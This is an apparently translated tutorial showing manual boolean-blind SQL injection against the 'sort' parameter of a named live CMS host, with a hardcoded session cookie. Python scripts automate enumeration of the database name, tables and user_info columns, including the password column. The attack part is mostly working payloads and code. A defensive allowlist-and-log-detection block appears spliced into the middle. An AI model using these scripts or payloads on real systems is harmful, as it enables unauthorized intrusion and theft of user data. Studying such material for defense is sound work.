Case study: Python-assisted manual SQL injection to enumerate a database

An SQL injection vulnerability was found.

The easy route is to dump the database directly with sqlmap.

But to really understand how SQL injection works, try manual injection and use a Python script to automate the guessing.

First, open HackBar.

Get the session ID after logging in to the CMS.

Start building the SQL payload.

Get the length of the database name:

    page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN (length(database())=8) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc

Manual guessing means iterating from 1 upwards; when the value reaches 8 the condition is true and the guess succeeds.

The tedious part of manual SQL injection is this guessing process: a lot of repetitive requests, which is why it is worth automating in Python.

The script is as follows:

    # -*- encoding:utf-8 -*-
    # Boolean-blind probe: when the condition is true the normal page comes back
    # (9459 bytes here); when it is false the ELSE branch forces a subquery error
    # and the response differs.
    import requests

    cookies = {
            'SESSION': 'dacee233-9fc0-442b-8948-8c276005d7c2'
    }
    url = 'http://yucms.hhlyty.cn/finance/account/accountList'

    for i in range(1, 300):
        # Get the length of the database name
        body = {'page': '1', 'rows': '15', 'order': 'desc',
                'sort': 'CREATE_DATE,(SELECT (CASE WHEN (length(database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)}
        # Alternative payload: get the number of tables in the database
        #body = {'page': '1', 'rows': '15', 'order': 'desc',
        #        'sort': '(SELECT (CASE WHEN ((select count(*) from information_schema.tables where table_schema =database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)}
        rs = requests.request("POST", url, cookies=cookies, params=body)
        length = len(rs.content)

        if length == 9459:
            print("数据库长度为:%d" % i)
            print(rs.text)
            break

Guessing the full database name

Payload:

    page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN (substr(database(),1,1)=char(71)) THEN 1 ELSE 2302*(SELECT 2302 FROM INFORMATION_SCHEMA.TABLES) END))&order=desc

In substr(database(),1,1), the first 1 is the position within the string and the second 1 is the number of characters to take, so the name can be guessed one character at a time.

    # -*- encoding:utf-8 -*-
    import requests

    cookies = {
            'SESSION': 'dacee233-9fc0-442b-8948-8c276005d7c2'
    }
    url = 'http://yucms.hhlyty.cn/finance/account/accountList'

    # Candidate characters, tried in order for every position of the name
    dic = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_^~]}|[{?>=<;:/.-,+*)('&%$#@!"
    print(len(dic))

    string = ''
    for i in range(1, 92):
        for j in dic:
            # Compare the i-th character of the database name with candidate j
            body = {'page': '1', 'rows': '15', 'order': 'desc',
                    'sort': '(SELECT (CASE WHEN (substr(database(),{0},1)=char({1})) THEN 1 ELSE 2302*(SELECT 2302 FROM INFORMATION_SCHEMA.TABLES) END))'.format(i, ord(j))}
            rs = requests.request("POST", url, cookies=cookies, params=body)
            length = len(rs.content)
            print(body)
            if length == 9459:
                print("数据库第%d个字符是:%s:" % (i, j))
                string += j
                break
        else:
            # No candidate matched, so position i is past the end of the name
            break
        print("数据库是:%s" % string)
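The sort value in the two scripts above is spliced straight into ORDER BY, which cannot take bind parameters, so the fix on the server side is an allowlist rather than escaping. What follows is an added example, not code from the original post or from the CMS: a hypothetical allowlisted ORDER BY builder for the accountList endpoint (the column names ACCOUNT_NAME and BALANCE are assumptions) plus a log check that flags requests carrying the CASE WHEN / INFORMATION_SCHEMA probes used above, run over constructed access-log lines.

```python
import re
from urllib.parse import parse_qs

# Allowlist of sort columns for the accountList endpoint (constructed; only
# CREATE_DATE appears on the page, the other two names are assumed).
ALLOWED_SORT = {"CREATE_DATE", "ACCOUNT_NAME", "BALANCE"}
ALLOWED_ORDER = {"asc", "desc"}

def build_order_by(sort, order):
    """Return an ORDER BY clause built only from allowlisted identifiers, or
    None when the input is rejected (the caller should answer 400).

    ORDER BY cannot take bind parameters, so user input has to be mapped onto
    a fixed set of columns and directions instead of being concatenated into
    the query, which is what makes the sort parameter above injectable.
    """
    if sort not in ALLOWED_SORT or order.lower() not in ALLOWED_ORDER:
        return None
    return "ORDER BY %s %s" % (sort, order.upper())

# Signature of the boolean-blind probes on this page: CASE WHEN ... THEN ...
# ELSE <n>*(SELECT ... FROM INFORMATION_SCHEMA.x) END.
_BLIND_PROBE = re.compile(r"CASE\s+WHEN\b.*?\bTHEN\b.*?\bELSE\b.*?INFORMATION_SCHEMA",
                          re.IGNORECASE | re.DOTALL)

def flag_suspicious_requests(log_lines):
    """Return (line_no, sort_value) for requests whose sort value is outside
    the allowlist or carries the probe signature; benign requests are skipped."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        if "?" not in line:
            continue
        qs = line.split("?", 1)[1].split(" ", 1)[0]  # query string up to " HTTP/1.1"
        for sort_value in parse_qs(qs).get("sort", []):  # parse_qs also URL-decodes
            if sort_value not in ALLOWED_SORT or _BLIND_PROBE.search(sort_value):
                hits.append((n, sort_value))
    return hits

# Constructed access-log lines (not captured from the page's target).
SAMPLE_LOG = [
    '10.0.0.5 - - "POST /finance/account/accountList?page=1&rows=15&sort=CREATE_DATE&order=desc HTTP/1.1" 200 9459',
    '10.0.0.9 - - "POST /finance/account/accountList?page=1&rows=15&sort=CREATE_DATE,(SELECT%20(CASE%20WHEN%20(length(database())=8)%20THEN%209441%20ELSE%209441*(SELECT%209441%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS)%20END))&order=desc HTTP/1.1" 200 9459',
]
```

Note that a legitimate request whose response is also 9459 bytes is not flagged: the check keys on the sort value, not on the response size the probes rely on.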

Guessing table names:

1. Guess the length of the name of the 204th table:

    page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN ((select length(table_name) from information_schema.tables where table_schema=database() limit 204,1)=9) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc

    # -*- encoding:utf-8 -*-
    import requests

    cookies = {
            'SESSION': 'dacee233-9fc0-442b-8948-8c276005d7c2'
    }
    url = 'http://yucms.hhlyty.cn/finance/account/accountList'

    for i in range(1, 300):
        # Get the length of the name of the 204th table in the database
        body = {'page': '1', 'rows': '15', 'order': 'desc',
                'sort': '(SELECT (CASE WHEN ((select length(table_name) from information_schema.tables where table_schema=database() limit 204,1)={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)}
        # Alternative payload: get the number of tables in the database
        #body = {'page': '1', 'rows': '15', 'order': 'desc',
        #        'sort': '(SELECT (CASE WHEN ((select count(*) from information_schema.tables where table_schema =database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)}
        rs = requests.request("POST", url, cookies=cookies, params=body)
        length = len(rs.content)

        if length == 9459:
            print("表名长度为:%d" % i)
            print(rs.text)
            break

    page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN ((select ascii((select substr(table_name,1,1) from information_schema.tables where table_schema=database() limit 204,1)))=117) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc

Here 1 is the position of the first character of the table name,

204 selects the 204th table in the database, and

117 is the ASCII code of the first character.


Guessing column names:

1. First guess the number of columns in the table:

    page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN ((select count(*) from information_schema.columns where table_schema=database() and table_name='user_info')=36) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc

2. Guess each column in turn:

Guessing the password column:

Guess the length of the first column of the 204th table, user_info:

    page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN ((select length(column_name) from information_schema.columns where table_schema=database() and table_name='user_info' limit 1,1)=7) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc

Then guess the column name itself, character by character:

    page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN ((select ascii((select substr(column_name,1,1) from information_schema.columns where table_schema=database() and table_name='user_info' limit 1,1)))=85) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc

The first character of the column name is ASCII 85.

Original article: https://www.cnblogs.com/qmfsun/p/7606108.html